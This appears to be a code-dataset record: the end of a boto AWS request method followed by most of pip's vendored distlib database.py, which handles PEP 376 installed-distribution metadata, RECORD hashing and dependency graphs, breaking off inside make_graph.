def _make_request(self, action, verb, path, params):
params['ContentType'] = 'JSON'
response = self.make_request(action=action, verb='POST',
path='/', params=params)
body = response.read().decode('utf-8')
boto.log.debug(body)
if response.status == 200:
return json.loads(body)
else:
raise self.ResponseError(response.status, response.reason, body)
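# Usage sketch (illustrative; how the connection is constructed and the exact
# attributes on the raised exception are assumptions): every public method
# funnels through _make_request, which decodes the JSON body on HTTP 200 and
# raises ResponseError otherwise, so callers typically wrap calls like this:
#
#     try:
#         resp = conn.describe_events()
#     except conn.ResponseError as e:
#         print(e.status, e.reason)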
|
bsd-3-clause
|
kastriothaliti/techstitution
|
venv/lib/python3.5/site-packages/pip/_vendor/distlib/database.py
|
334
|
49672
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2012-2016 The Python Software Foundation.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
"""PEP 376 implementation."""
from __future__ import unicode_literals
import base64
import codecs
import contextlib
import hashlib
import logging
import os
import posixpath
import sys
import zipimport
from . import DistlibException, resources
from .compat import StringIO
from .version import get_scheme, UnsupportedVersionError
from .metadata import Metadata, METADATA_FILENAME, WHEEL_METADATA_FILENAME
from .util import (parse_requirement, cached_property, parse_name_and_version,
read_exports, write_exports, CSVReader, CSVWriter)
__all__ = ['Distribution', 'BaseInstalledDistribution',
'InstalledDistribution', 'EggInfoDistribution',
'DistributionPath']
logger = logging.getLogger(__name__)
EXPORTS_FILENAME = 'pydist-exports.json'
COMMANDS_FILENAME = 'pydist-commands.json'
DIST_FILES = ('INSTALLER', METADATA_FILENAME, 'RECORD', 'REQUESTED',
'RESOURCES', EXPORTS_FILENAME, 'SHARED')
DISTINFO_EXT = '.dist-info'
class _Cache(object):
"""
A simple cache mapping names and .dist-info paths to distributions
"""
def __init__(self):
"""
Initialise an instance. There is normally one for each DistributionPath.
"""
self.name = {}
self.path = {}
self.generated = False
def clear(self):
"""
Clear the cache, setting it to its initial state.
"""
self.name.clear()
self.path.clear()
self.generated = False
def add(self, dist):
"""
Add a distribution to the cache.
:param dist: The distribution to add.
"""
if dist.path not in self.path:
self.path[dist.path] = dist
self.name.setdefault(dist.key, []).append(dist)
class DistributionPath(object):
"""
Represents a set of distributions installed on a path (typically sys.path).
"""
def __init__(self, path=None, include_egg=False):
"""
Create an instance from a path, optionally including legacy (distutils/
setuptools/distribute) distributions.
:param path: The path to use, as a list of directories. If not specified,
sys.path is used.
:param include_egg: If True, this instance will look for and return legacy
distributions as well as those based on PEP 376.
"""
if path is None:
path = sys.path
self.path = path
self._include_dist = True
self._include_egg = include_egg
self._cache = _Cache()
self._cache_egg = _Cache()
self._cache_enabled = True
self._scheme = get_scheme('default')
def _get_cache_enabled(self):
return self._cache_enabled
def _set_cache_enabled(self, value):
self._cache_enabled = value
cache_enabled = property(_get_cache_enabled, _set_cache_enabled)
def clear_cache(self):
"""
Clears the internal cache.
"""
self._cache.clear()
self._cache_egg.clear()
def _yield_distributions(self):
"""
Yield .dist-info and/or .egg(-info) distributions.
"""
# We need to check if we've seen some resources already, because on
# some Linux systems (e.g. some Debian/Ubuntu variants) there are
# symlinks which alias other files in the environment.
seen = set()
for path in self.path:
finder = resources.finder_for_path(path)
if finder is None:
continue
r = finder.find('')
if not r or not r.is_container:
continue
rset = sorted(r.resources)
for entry in rset:
r = finder.find(entry)
if not r or r.path in seen:
continue
if self._include_dist and entry.endswith(DISTINFO_EXT):
possible_filenames = [METADATA_FILENAME, WHEEL_METADATA_FILENAME]
for metadata_filename in possible_filenames:
metadata_path = posixpath.join(entry, metadata_filename)
pydist = finder.find(metadata_path)
if pydist:
break
else:
continue
with contextlib.closing(pydist.as_stream()) as stream:
metadata = Metadata(fileobj=stream, scheme='legacy')
logger.debug('Found %s', r.path)
seen.add(r.path)
yield new_dist_class(r.path, metadata=metadata,
env=self)
elif self._include_egg and entry.endswith(('.egg-info',
'.egg')):
logger.debug('Found %s', r.path)
seen.add(r.path)
yield old_dist_class(r.path, self)
def _generate_cache(self):
"""
Scan the path for distributions and populate the cache with
those that are found.
"""
gen_dist = not self._cache.generated
gen_egg = self._include_egg and not self._cache_egg.generated
if gen_dist or gen_egg:
for dist in self._yield_distributions():
if isinstance(dist, InstalledDistribution):
self._cache.add(dist)
else:
self._cache_egg.add(dist)
if gen_dist:
self._cache.generated = True
if gen_egg:
self._cache_egg.generated = True
@classmethod
def distinfo_dirname(cls, name, version):
"""
The *name* and *version* parameters are converted into their
filename-escaped form, i.e. any ``'-'`` characters are replaced
with ``'_'`` other than the one in ``'dist-info'`` and the one
separating the name from the version number.
:parameter name: is converted to a standard distribution name by replacing
                         any runs of non-alphanumeric characters with a single
``'-'``.
:type name: string
:parameter version: is converted to a standard version string. Spaces
become dots, and all other non-alphanumeric characters
(except dots) become dashes, with runs of multiple
dashes condensed to a single dash.
:type version: string
:returns: directory name
:rtype: string"""
name = name.replace('-', '_')
return '-'.join([name, version]) + DISTINFO_EXT
def get_distributions(self):
"""
Provides an iterator that looks for distributions and returns
:class:`InstalledDistribution` or
:class:`EggInfoDistribution` instances for each one of them.
:rtype: iterator of :class:`InstalledDistribution` and
:class:`EggInfoDistribution` instances
"""
if not self._cache_enabled:
for dist in self._yield_distributions():
yield dist
else:
self._generate_cache()
for dist in self._cache.path.values():
yield dist
if self._include_egg:
for dist in self._cache_egg.path.values():
yield dist
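    # Usage sketch (illustrative): enumerate everything importable from
    # sys.path, including legacy .egg/.egg-info metadata.
    #
    #     dp = DistributionPath(include_egg=True)
    #     for dist in dp.get_distributions():
    #         print(dist.name, dist.version)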
def get_distribution(self, name):
"""
Looks for a named distribution on the path.
This function only returns the first result found, as no more than one
value is expected. If nothing is found, ``None`` is returned.
:rtype: :class:`InstalledDistribution`, :class:`EggInfoDistribution`
or ``None``
"""
result = None
name = name.lower()
if not self._cache_enabled:
for dist in self._yield_distributions():
if dist.key == name:
result = dist
break
else:
self._generate_cache()
if name in self._cache.name:
result = self._cache.name[name][0]
elif self._include_egg and name in self._cache_egg.name:
result = self._cache_egg.name[name][0]
return result
def provides_distribution(self, name, version=None):
"""
Iterates over all distributions to find which distributions provide *name*.
If a *version* is provided, it will be used to filter the results.
        This is a generator: every distribution found that provides *name*
        (and, when *version* is given, a matching version) is yielded.
:parameter version: a version specifier that indicates the version
required, conforming to the format in ``PEP-345``
:type name: string
:type version: string
"""
matcher = None
        if version is not None:
try:
matcher = self._scheme.matcher('%s (%s)' % (name, version))
except ValueError:
raise DistlibException('invalid name or version: %r, %r' %
(name, version))
for dist in self.get_distributions():
provided = dist.provides
for p in provided:
p_name, p_ver = parse_name_and_version(p)
if matcher is None:
if p_name == name:
yield dist
break
else:
if p_name == name and matcher.match(p_ver):
yield dist
break
def get_file_path(self, name, relative_path):
"""
Return the path to a resource file.
"""
dist = self.get_distribution(name)
if dist is None:
raise LookupError('no distribution named %r found' % name)
return dist.get_resource_path(relative_path)
def get_exported_entries(self, category, name=None):
"""
Return all of the exported entries in a particular category.
:param category: The category to search for entries.
:param name: If specified, only entries with that name are returned.
"""
for dist in self.get_distributions():
r = dist.exports
if category in r:
d = r[category]
if name is not None:
if name in d:
yield d[name]
else:
for v in d.values():
yield v
class Distribution(object):
"""
A base class for distributions, whether installed or from indexes.
Either way, it must have some metadata, so that's all that's needed
for construction.
"""
build_time_dependency = False
"""
Set to True if it's known to be only a build-time dependency (i.e.
not needed after installation).
"""
requested = False
"""A boolean that indicates whether the ``REQUESTED`` metadata file is
present (in other words, whether the package was installed by user
request or it was installed as a dependency)."""
def __init__(self, metadata):
"""
Initialise an instance.
:param metadata: The instance of :class:`Metadata` describing this
distribution.
"""
self.metadata = metadata
self.name = metadata.name
self.key = self.name.lower() # for case-insensitive comparisons
self.version = metadata.version
self.locator = None
self.digest = None
self.extras = None # additional features requested
self.context = None # environment marker overrides
self.download_urls = set()
self.digests = {}
@property
def source_url(self):
"""
The source archive download URL for this distribution.
"""
return self.metadata.source_url
download_url = source_url # Backward compatibility
@property
def name_and_version(self):
"""
A utility property which displays the name and version in parentheses.
"""
return '%s (%s)' % (self.name, self.version)
@property
def provides(self):
"""
A set of distribution names and versions provided by this distribution.
:return: A set of "name (version)" strings.
"""
plist = self.metadata.provides
s = '%s (%s)' % (self.name, self.version)
if s not in plist:
plist.append(s)
return plist
def _get_requirements(self, req_attr):
md = self.metadata
logger.debug('Getting requirements from metadata %r', md.todict())
reqts = getattr(md, req_attr)
return set(md.get_requirements(reqts, extras=self.extras,
env=self.context))
@property
def run_requires(self):
return self._get_requirements('run_requires')
@property
def meta_requires(self):
return self._get_requirements('meta_requires')
@property
def build_requires(self):
return self._get_requirements('build_requires')
@property
def test_requires(self):
return self._get_requirements('test_requires')
@property
def dev_requires(self):
return self._get_requirements('dev_requires')
def matches_requirement(self, req):
"""
Say if this instance matches (fulfills) a requirement.
:param req: The requirement to match.
        :type req: str
:return: True if it matches, else False.
"""
# Requirement may contain extras - parse to lose those
# from what's passed to the matcher
r = parse_requirement(req)
scheme = get_scheme(self.metadata.scheme)
try:
matcher = scheme.matcher(r.requirement)
except UnsupportedVersionError:
# XXX compat-mode if cannot read the version
logger.warning('could not read version %r - using name only',
req)
name = req.split()[0]
matcher = scheme.matcher(name)
name = matcher.key # case-insensitive
result = False
for p in self.provides:
p_name, p_ver = parse_name_and_version(p)
if p_name != name:
continue
try:
result = matcher.match(p_ver)
break
except UnsupportedVersionError:
pass
return result
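    # Usage sketch (illustrative; `dist` and the requirement string are
    # assumed): matches_requirement() parses the requirement, then checks it
    # against every "name (version)" entry in self.provides.
    #
    #     if dist.matches_requirement('requests (>=2.0)'):
    #         print('%s satisfies the requirement' % dist.name_and_version)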
def __repr__(self):
"""
        Return a textual representation of this instance.
"""
if self.source_url:
suffix = ' [%s]' % self.source_url
else:
suffix = ''
return '<Distribution %s (%s)%s>' % (self.name, self.version, suffix)
def __eq__(self, other):
"""
See if this distribution is the same as another.
:param other: The distribution to compare with. To be equal to one
                      another, distributions must have the same type, name,
version and source_url.
:return: True if it is the same, else False.
"""
if type(other) is not type(self):
result = False
else:
result = (self.name == other.name and
self.version == other.version and
self.source_url == other.source_url)
return result
def __hash__(self):
"""
Compute hash in a way which matches the equality test.
"""
return hash(self.name) + hash(self.version) + hash(self.source_url)
class BaseInstalledDistribution(Distribution):
"""
This is the base class for installed distributions (whether PEP 376 or
legacy).
"""
hasher = None
def __init__(self, metadata, path, env=None):
"""
Initialise an instance.
:param metadata: An instance of :class:`Metadata` which describes the
distribution. This will normally have been initialised
from a metadata file in the ``path``.
:param path: The path of the ``.dist-info`` or ``.egg-info``
directory for the distribution.
:param env: This is normally the :class:`DistributionPath`
instance where this distribution was found.
"""
super(BaseInstalledDistribution, self).__init__(metadata)
self.path = path
self.dist_path = env
def get_hash(self, data, hasher=None):
"""
Get the hash of some data, using a particular hash algorithm, if
specified.
:param data: The data to be hashed.
:type data: bytes
:param hasher: The name of a hash implementation, supported by hashlib,
or ``None``. Examples of valid values are ``'sha1'``,
                       ``'sha224'``, ``'sha384'``, ``'sha256'``, ``'md5'`` and
``'sha512'``. If no hasher is specified, the ``hasher``
attribute of the :class:`InstalledDistribution` instance
is used. If the hasher is determined to be ``None``, MD5
is used as the hashing algorithm.
:returns: The hash of the data. If a hasher was explicitly specified,
the returned hash will be prefixed with the specified hasher
followed by '='.
:rtype: str
"""
if hasher is None:
hasher = self.hasher
if hasher is None:
hasher = hashlib.md5
prefix = ''
else:
            prefix = '%s=' % hasher
            hasher = getattr(hashlib, hasher)
digest = hasher(data).digest()
digest = base64.urlsafe_b64encode(digest).rstrip(b'=').decode('ascii')
return '%s%s' % (prefix, digest)
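    # Usage sketch (illustrative; `dist` is an assumed instance): when neither
    # the instance nor the call names a hash algorithm, the digest falls back
    # to unprefixed MD5; a named algorithm yields a '<name>=<digest>' value,
    # which is the form InstalledDistribution (hasher = 'sha256') writes into
    # RECORD.
    #
    #     dist.get_hash(b'payload')            # MD5, urlsafe base64, no prefix
    #     dist.get_hash(b'payload', 'sha256')  # 'sha256=<urlsafe base64 digest>'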
class InstalledDistribution(BaseInstalledDistribution):
"""
Created with the *path* of the ``.dist-info`` directory provided to the
constructor. It reads the metadata contained in ``pydist.json`` when it is
    instantiated, or uses a passed-in Metadata instance (useful for when
dry-run mode is being used).
"""
hasher = 'sha256'
def __init__(self, path, metadata=None, env=None):
self.finder = finder = resources.finder_for_path(path)
if finder is None:
            raise ValueError('finder unavailable for %s' % path)
if env and env._cache_enabled and path in env._cache.path:
metadata = env._cache.path[path].metadata
elif metadata is None:
r = finder.find(METADATA_FILENAME)
# Temporary - for Wheel 0.23 support
if r is None:
r = finder.find(WHEEL_METADATA_FILENAME)
# Temporary - for legacy support
if r is None:
r = finder.find('METADATA')
if r is None:
raise ValueError('no %s found in %s' % (METADATA_FILENAME,
path))
with contextlib.closing(r.as_stream()) as stream:
metadata = Metadata(fileobj=stream, scheme='legacy')
super(InstalledDistribution, self).__init__(metadata, path, env)
if env and env._cache_enabled:
env._cache.add(self)
        r = finder.find('REQUESTED')
self.requested = r is not None
def __repr__(self):
return '<InstalledDistribution %r %s at %r>' % (
self.name, self.version, self.path)
def __str__(self):
return "%s %s" % (self.name, self.version)
def _get_records(self):
"""
Get the list of installed files for the distribution
:return: A list of tuples of path, hash and size. Note that hash and
size might be ``None`` for some entries. The path is exactly
as stored in the file (which is as in PEP 376).
"""
results = []
r = self.get_distinfo_resource('RECORD')
with contextlib.closing(r.as_stream()) as stream:
with CSVReader(stream=stream) as record_reader:
# Base location is parent dir of .dist-info dir
#base_location = os.path.dirname(self.path)
#base_location = os.path.abspath(base_location)
for row in record_reader:
missing = [None for i in range(len(row), 3)]
path, checksum, size = row + missing
#if not os.path.isabs(path):
# path = path.replace('/', os.sep)
# path = os.path.join(base_location, path)
results.append((path, checksum, size))
return results
@cached_property
def exports(self):
"""
Return the information exported by this distribution.
:return: A dictionary of exports, mapping an export category to a dict
of :class:`ExportEntry` instances describing the individual
export entries, and keyed by name.
"""
result = {}
r = self.get_distinfo_resource(EXPORTS_FILENAME)
if r:
result = self.read_exports()
return result
def read_exports(self):
"""
Read exports data from a file in .ini format.
:return: A dictionary of exports, mapping an export category to a list
of :class:`ExportEntry` instances describing the individual
export entries.
"""
result = {}
r = self.get_distinfo_resource(EXPORTS_FILENAME)
if r:
with contextlib.closing(r.as_stream()) as stream:
result = read_exports(stream)
return result
def write_exports(self, exports):
"""
Write a dictionary of exports to a file in .ini format.
:param exports: A dictionary of exports, mapping an export category to
a list of :class:`ExportEntry` instances describing the
individual export entries.
"""
rf = self.get_distinfo_file(EXPORTS_FILENAME)
with open(rf, 'w') as f:
write_exports(exports, f)
def get_resource_path(self, relative_path):
"""
NOTE: This API may change in the future.
Return the absolute path to a resource file with the given relative
path.
:param relative_path: The path, relative to .dist-info, of the resource
of interest.
:return: The absolute path where the resource is to be found.
"""
r = self.get_distinfo_resource('RESOURCES')
with contextlib.closing(r.as_stream()) as stream:
with CSVReader(stream=stream) as resources_reader:
for relative, destination in resources_reader:
if relative == relative_path:
return destination
raise KeyError('no resource file with relative path %r '
'is installed' % relative_path)
def list_installed_files(self):
"""
Iterates over the ``RECORD`` entries and returns a tuple
``(path, hash, size)`` for each line.
:returns: iterator of (path, hash, size)
"""
for result in self._get_records():
yield result
def write_installed_files(self, paths, prefix, dry_run=False):
"""
Writes the ``RECORD`` file, using the ``paths`` iterable passed in. Any
existing ``RECORD`` file is silently overwritten.
prefix is used to determine when to write absolute paths.
"""
prefix = os.path.join(prefix, '')
base = os.path.dirname(self.path)
base_under_prefix = base.startswith(prefix)
base = os.path.join(base, '')
record_path = self.get_distinfo_file('RECORD')
logger.info('creating %s', record_path)
if dry_run:
return None
with CSVWriter(record_path) as writer:
for path in paths:
if os.path.isdir(path) or path.endswith(('.pyc', '.pyo')):
# do not put size and hash, as in PEP-376
hash_value = size = ''
else:
size = '%d' % os.path.getsize(path)
with open(path, 'rb') as fp:
hash_value = self.get_hash(fp.read())
if path.startswith(base) or (base_under_prefix and
path.startswith(prefix)):
path = os.path.relpath(path, base)
writer.writerow((path, hash_value, size))
# add the RECORD file itself
if record_path.startswith(base):
record_path = os.path.relpath(record_path, base)
writer.writerow((record_path, '', ''))
return record_path
def check_installed_files(self):
"""
Checks that the hashes and sizes of the files in ``RECORD`` are
matched by the files themselves. Returns a (possibly empty) list of
mismatches. Each entry in the mismatch list will be a tuple consisting
of the path, 'exists', 'size' or 'hash' according to what didn't match
(existence is checked first, then size, then hash), the expected
value and the actual value.
"""
mismatches = []
base = os.path.dirname(self.path)
record_path = self.get_distinfo_file('RECORD')
for path, hash_value, size in self.list_installed_files():
if not os.path.isabs(path):
path = os.path.join(base, path)
if path == record_path:
continue
if not os.path.exists(path):
mismatches.append((path, 'exists', True, False))
elif os.path.isfile(path):
actual_size = str(os.path.getsize(path))
if size and actual_size != size:
mismatches.append((path, 'size', size, actual_size))
elif hash_value:
if '=' in hash_value:
hasher = hash_value.split('=', 1)[0]
else:
hasher = None
with open(path, 'rb') as f:
actual_hash = self.get_hash(f.read(), hasher)
if actual_hash != hash_value:
mismatches.append((path, 'hash', hash_value, actual_hash))
return mismatches
@cached_property
def shared_locations(self):
"""
A dictionary of shared locations whose keys are in the set 'prefix',
'purelib', 'platlib', 'scripts', 'headers', 'data' and 'namespace'.
The corresponding value is the absolute path of that category for
this distribution, and takes into account any paths selected by the
user at installation time (e.g. via command-line arguments). In the
case of the 'namespace' key, this would be a list of absolute paths
for the roots of namespace packages in this distribution.
The first time this property is accessed, the relevant information is
read from the SHARED file in the .dist-info directory.
"""
result = {}
shared_path = os.path.join(self.path, 'SHARED')
if os.path.isfile(shared_path):
with codecs.open(shared_path, 'r', encoding='utf-8') as f:
lines = f.read().splitlines()
for line in lines:
key, value = line.split('=', 1)
if key == 'namespace':
result.setdefault(key, []).append(value)
else:
result[key] = value
return result
def write_shared_locations(self, paths, dry_run=False):
"""
Write shared location information to the SHARED file in .dist-info.
:param paths: A dictionary as described in the documentation for
:meth:`shared_locations`.
:param dry_run: If True, the action is logged but no file is actually
written.
:return: The path of the file written to.
"""
shared_path = os.path.join(self.path, 'SHARED')
logger.info('creating %s', shared_path)
if dry_run:
return None
lines = []
for key in ('prefix', 'lib', 'headers', 'scripts', 'data'):
path = paths[key]
if os.path.isdir(paths[key]):
lines.append('%s=%s' % (key, path))
for ns in paths.get('namespace', ()):
lines.append('namespace=%s' % ns)
with codecs.open(shared_path, 'w', encoding='utf-8') as f:
f.write('\n'.join(lines))
return shared_path
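    # Usage sketch (illustrative; the concrete paths are assumptions): SHARED
    # is written as plain key=value lines, one line per namespace root, and
    # only categories whose paths exist as directories are recorded.
    #
    #     dist.write_shared_locations({
    #         'prefix': '/usr/local',
    #         'lib': '/usr/local/lib/python3.5/site-packages',
    #         'headers': '/usr/local/include/python3.5',
    #         'scripts': '/usr/local/bin',
    #         'data': '/usr/local',
    #         'namespace': [],
    #     })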
def get_distinfo_resource(self, path):
if path not in DIST_FILES:
raise DistlibException('invalid path for a dist-info file: '
'%r at %r' % (path, self.path))
finder = resources.finder_for_path(self.path)
if finder is None:
raise DistlibException('Unable to get a finder for %s' % self.path)
return finder.find(path)
def get_distinfo_file(self, path):
"""
Returns a path located under the ``.dist-info`` directory. Returns a
string representing the path.
:parameter path: a ``'/'``-separated path relative to the
``.dist-info`` directory or an absolute path;
If *path* is an absolute path and doesn't start
with the ``.dist-info`` directory path,
a :class:`DistlibException` is raised
:type path: str
:rtype: str
"""
# Check if it is an absolute path # XXX use relpath, add tests
if path.find(os.sep) >= 0:
# it's an absolute path?
distinfo_dirname, path = path.split(os.sep)[-2:]
if distinfo_dirname != self.path.split(os.sep)[-1]:
raise DistlibException(
'dist-info file %r does not belong to the %r %s '
'distribution' % (path, self.name, self.version))
# The file must be relative
if path not in DIST_FILES:
raise DistlibException('invalid path for a dist-info file: '
'%r at %r' % (path, self.path))
return os.path.join(self.path, path)
def list_distinfo_files(self):
"""
Iterates over the ``RECORD`` entries and returns paths for each line if
the path is pointing to a file located in the ``.dist-info`` directory
or one of its subdirectories.
:returns: iterator of paths
"""
base = os.path.dirname(self.path)
for path, checksum, size in self._get_records():
# XXX add separator or use real relpath algo
if not os.path.isabs(path):
path = os.path.join(base, path)
if path.startswith(self.path):
yield path
def __eq__(self, other):
return (isinstance(other, InstalledDistribution) and
self.path == other.path)
# See http://docs.python.org/reference/datamodel#object.__hash__
__hash__ = object.__hash__
class EggInfoDistribution(BaseInstalledDistribution):
"""Created with the *path* of the ``.egg-info`` directory or file provided
to the constructor. It reads the metadata contained in the file itself, or
if the given path happens to be a directory, the metadata is read from the
file ``PKG-INFO`` under that directory."""
requested = True # as we have no way of knowing, assume it was
shared_locations = {}
def __init__(self, path, env=None):
def set_name_and_version(s, n, v):
s.name = n
s.key = n.lower() # for case-insensitive comparisons
s.version = v
self.path = path
self.dist_path = env
if env and env._cache_enabled and path in env._cache_egg.path:
metadata = env._cache_egg.path[path].metadata
set_name_and_version(self, metadata.name, metadata.version)
else:
metadata = self._get_metadata(path)
# Need to be set before caching
set_name_and_version(self, metadata.name, metadata.version)
if env and env._cache_enabled:
env._cache_egg.add(self)
super(EggInfoDistribution, self).__init__(metadata, path, env)
def _get_metadata(self, path):
requires = None
def parse_requires_data(data):
"""Create a list of dependencies from a requires.txt file.
*data*: the contents of a setuptools-produced requires.txt file.
"""
reqs = []
lines = data.splitlines()
for line in lines:
line = line.strip()
if line.startswith('['):
logger.warning('Unexpected line: quitting requirement scan: %r',
line)
break
r = parse_requirement(line)
if not r:
logger.warning('Not recognised as a requirement: %r', line)
continue
if r.extras:
logger.warning('extra requirements in requires.txt are '
'not supported')
if not r.constraints:
reqs.append(r.name)
else:
cons = ', '.join('%s%s' % c for c in r.constraints)
reqs.append('%s (%s)' % (r.name, cons))
return reqs
def parse_requires_path(req_path):
"""Create a list of dependencies from a requires.txt file.
*req_path*: the path to a setuptools-produced requires.txt file.
"""
reqs = []
try:
with codecs.open(req_path, 'r', 'utf-8') as fp:
reqs = parse_requires_data(fp.read())
except IOError:
pass
return reqs
if path.endswith('.egg'):
if os.path.isdir(path):
meta_path = os.path.join(path, 'EGG-INFO', 'PKG-INFO')
metadata = Metadata(path=meta_path, scheme='legacy')
req_path = os.path.join(path, 'EGG-INFO', 'requires.txt')
requires = parse_requires_path(req_path)
else:
# FIXME handle the case where zipfile is not available
zipf = zipimport.zipimporter(path)
fileobj = StringIO(
zipf.get_data('EGG-INFO/PKG-INFO').decode('utf8'))
metadata = Metadata(fileobj=fileobj, scheme='legacy')
try:
data = zipf.get_data('EGG-INFO/requires.txt')
requires = parse_requires_data(data.decode('utf-8'))
except IOError:
requires = None
elif path.endswith('.egg-info'):
if os.path.isdir(path):
req_path = os.path.join(path, 'requires.txt')
requires = parse_requires_path(req_path)
path = os.path.join(path, 'PKG-INFO')
metadata = Metadata(path=path, scheme='legacy')
else:
raise DistlibException('path must end with .egg-info or .egg, '
'got %r' % path)
if requires:
metadata.add_requirements(requires)
return metadata
def __repr__(self):
return '<EggInfoDistribution %r %s at %r>' % (
self.name, self.version, self.path)
def __str__(self):
return "%s %s" % (self.name, self.version)
def check_installed_files(self):
"""
Checks that the hashes and sizes of the files in ``RECORD`` are
matched by the files themselves. Returns a (possibly empty) list of
mismatches. Each entry in the mismatch list will be a tuple consisting
of the path, 'exists', 'size' or 'hash' according to what didn't match
(existence is checked first, then size, then hash), the expected
value and the actual value.
"""
mismatches = []
record_path = os.path.join(self.path, 'installed-files.txt')
if os.path.exists(record_path):
for path, _, _ in self.list_installed_files():
if path == record_path:
continue
if not os.path.exists(path):
mismatches.append((path, 'exists', True, False))
return mismatches
def list_installed_files(self):
"""
Iterates over the ``installed-files.txt`` entries and returns a tuple
``(path, hash, size)`` for each line.
:returns: a list of (path, hash, size)
"""
def _md5(path):
f = open(path, 'rb')
try:
content = f.read()
finally:
f.close()
return hashlib.md5(content).hexdigest()
def _size(path):
return os.stat(path).st_size
record_path = os.path.join(self.path, 'installed-files.txt')
result = []
if os.path.exists(record_path):
with codecs.open(record_path, 'r', encoding='utf-8') as f:
for line in f:
line = line.strip()
p = os.path.normpath(os.path.join(self.path, line))
# "./" is present as a marker between installed files
# and installation metadata files
if not os.path.exists(p):
logger.warning('Non-existent file: %s', p)
if p.endswith(('.pyc', '.pyo')):
continue
#otherwise fall through and fail
if not os.path.isdir(p):
result.append((p, _md5(p), _size(p)))
result.append((record_path, None, None))
return result
def list_distinfo_files(self, absolute=False):
"""
Iterates over the ``installed-files.txt`` entries and returns paths for
each line if the path is pointing to a file located in the
``.egg-info`` directory or one of its subdirectories.
:parameter absolute: If *absolute* is ``True``, each returned path is
transformed into a local absolute path. Otherwise the
raw value from ``installed-files.txt`` is returned.
:type absolute: boolean
:returns: iterator of paths
"""
record_path = os.path.join(self.path, 'installed-files.txt')
skip = True
with codecs.open(record_path, 'r', encoding='utf-8') as f:
for line in f:
line = line.strip()
if line == './':
skip = False
continue
if not skip:
p = os.path.normpath(os.path.join(self.path, line))
if p.startswith(self.path):
if absolute:
yield p
else:
yield line
def __eq__(self, other):
return (isinstance(other, EggInfoDistribution) and
self.path == other.path)
# See http://docs.python.org/reference/datamodel#object.__hash__
__hash__ = object.__hash__
new_dist_class = InstalledDistribution
old_dist_class = EggInfoDistribution
class DependencyGraph(object):
"""
Represents a dependency graph between distributions.
The dependency relationships are stored in an ``adjacency_list`` that maps
distributions to a list of ``(other, label)`` tuples where ``other``
is a distribution and the edge is labeled with ``label`` (i.e. the version
specifier, if such was provided). Also, for more efficient traversal, for
every distribution ``x``, a list of predecessors is kept in
``reverse_list[x]``. An edge from distribution ``a`` to
distribution ``b`` means that ``a`` depends on ``b``. If any missing
dependencies are found, they are stored in ``missing``, which is a
dictionary that maps distributions to a list of requirements that were not
provided by any other distributions.
"""
def __init__(self):
self.adjacency_list = {}
self.reverse_list = {}
self.missing = {}
def add_distribution(self, distribution):
"""Add the *distribution* to the graph.
:type distribution: :class:`distutils2.database.InstalledDistribution`
or :class:`distutils2.database.EggInfoDistribution`
"""
self.adjacency_list[distribution] = []
self.reverse_list[distribution] = []
#self.missing[distribution] = []
def add_edge(self, x, y, label=None):
"""Add an edge from distribution *x* to distribution *y* with the given
*label*.
:type x: :class:`distutils2.database.InstalledDistribution` or
:class:`distutils2.database.EggInfoDistribution`
:type y: :class:`distutils2.database.InstalledDistribution` or
:class:`distutils2.database.EggInfoDistribution`
:type label: ``str`` or ``None``
"""
self.adjacency_list[x].append((y, label))
# multiple edges are allowed, so be careful
if x not in self.reverse_list[y]:
self.reverse_list[y].append(x)
def add_missing(self, distribution, requirement):
"""
Add a missing *requirement* for the given *distribution*.
:type distribution: :class:`distutils2.database.InstalledDistribution`
or :class:`distutils2.database.EggInfoDistribution`
:type requirement: ``str``
"""
logger.debug('%s missing %r', distribution, requirement)
self.missing.setdefault(distribution, []).append(requirement)
def _repr_dist(self, dist):
return '%s %s' % (dist.name, dist.version)
def repr_node(self, dist, level=1):
"""Prints only a subgraph"""
output = [self._repr_dist(dist)]
for other, label in self.adjacency_list[dist]:
dist = self._repr_dist(other)
if label is not None:
dist = '%s [%s]' % (dist, label)
output.append(' ' * level + str(dist))
suboutput = self.repr_node(other, level + 1)
subs = suboutput.split('\n')
output.extend(subs[1:])
return '\n'.join(output)
def to_dot(self, f, skip_disconnected=True):
"""Writes a DOT output for the graph to the provided file *f*.
If *skip_disconnected* is set to ``True``, then all distributions
that are not dependent on any other distribution are skipped.
:type f: has to support ``file``-like operations
:type skip_disconnected: ``bool``
"""
disconnected = []
f.write("digraph dependencies {\n")
for dist, adjs in self.adjacency_list.items():
if len(adjs) == 0 and not skip_disconnected:
disconnected.append(dist)
for other, label in adjs:
                if label is not None:
f.write('"%s" -> "%s" [label="%s"]\n' %
(dist.name, other.name, label))
else:
f.write('"%s" -> "%s"\n' % (dist.name, other.name))
if not skip_disconnected and len(disconnected) > 0:
f.write('subgraph disconnected {\n')
f.write('label = "Disconnected"\n')
f.write('bgcolor = red\n')
for dist in disconnected:
f.write('"%s"' % dist.name)
f.write('\n')
f.write('}\n')
f.write('}\n')
def topological_sort(self):
"""
Perform a topological sort of the graph.
:return: A tuple, the first element of which is a topologically sorted
list of distributions, and the second element of which is a
list of distributions that cannot be sorted because they have
circular dependencies and so form a cycle.
"""
result = []
# Make a shallow copy of the adjacency list
alist = {}
for k, v in self.adjacency_list.items():
alist[k] = v[:]
while True:
# See what we can remove in this run
to_remove = []
for k, v in list(alist.items())[:]:
if not v:
to_remove.append(k)
del alist[k]
if not to_remove:
# What's left in alist (if anything) is a cycle.
break
# Remove from the adjacency list of others
for k, v in alist.items():
alist[k] = [(d, r) for d, r in v if d not in to_remove]
logger.debug('Moving to result: %s',
['%s (%s)' % (d.name, d.version) for d in to_remove])
result.extend(to_remove)
return result, list(alist.keys())
def __repr__(self):
"""Representation of the graph"""
output = []
for dist, adjs in self.adjacency_list.items():
output.append(self.repr_node(dist))
return '\n'.join(output)
def make_graph(dists, scheme='default'):
"""Makes a dependency graph from the given distributions.
:parameter dists: a list of distributions
:type dists: list of :class:`distutils2.database.InstalledDistribution` and
:class:`distutils2.database.EggInfoDistribution` instances
:rtype: a :class:`DependencyGraph` instance
"""
scheme = get_scheme(scheme)
graph = DependencyGraph()
provided = {} # maps names to lists of (version, dist) tuples
# first, build the graph and find out what's provided
for dist in dists:
graph.add_distribution(dist)
for p in dist.provides:
name, version = parse_name_and_version(p)
logger.debug('Add to provided: %s, %s, %s', name, version, dist)
provided.setdefault(name, []).append((version, dist))
# now make the edges
for dist in dists:
requires = (dist.run_requires | dist.meta_requires |
dist.build_requires | dist.dev_requires)
for req in requires:
try:
matcher = scheme.matcher(req)
except UnsupportedVersionError:
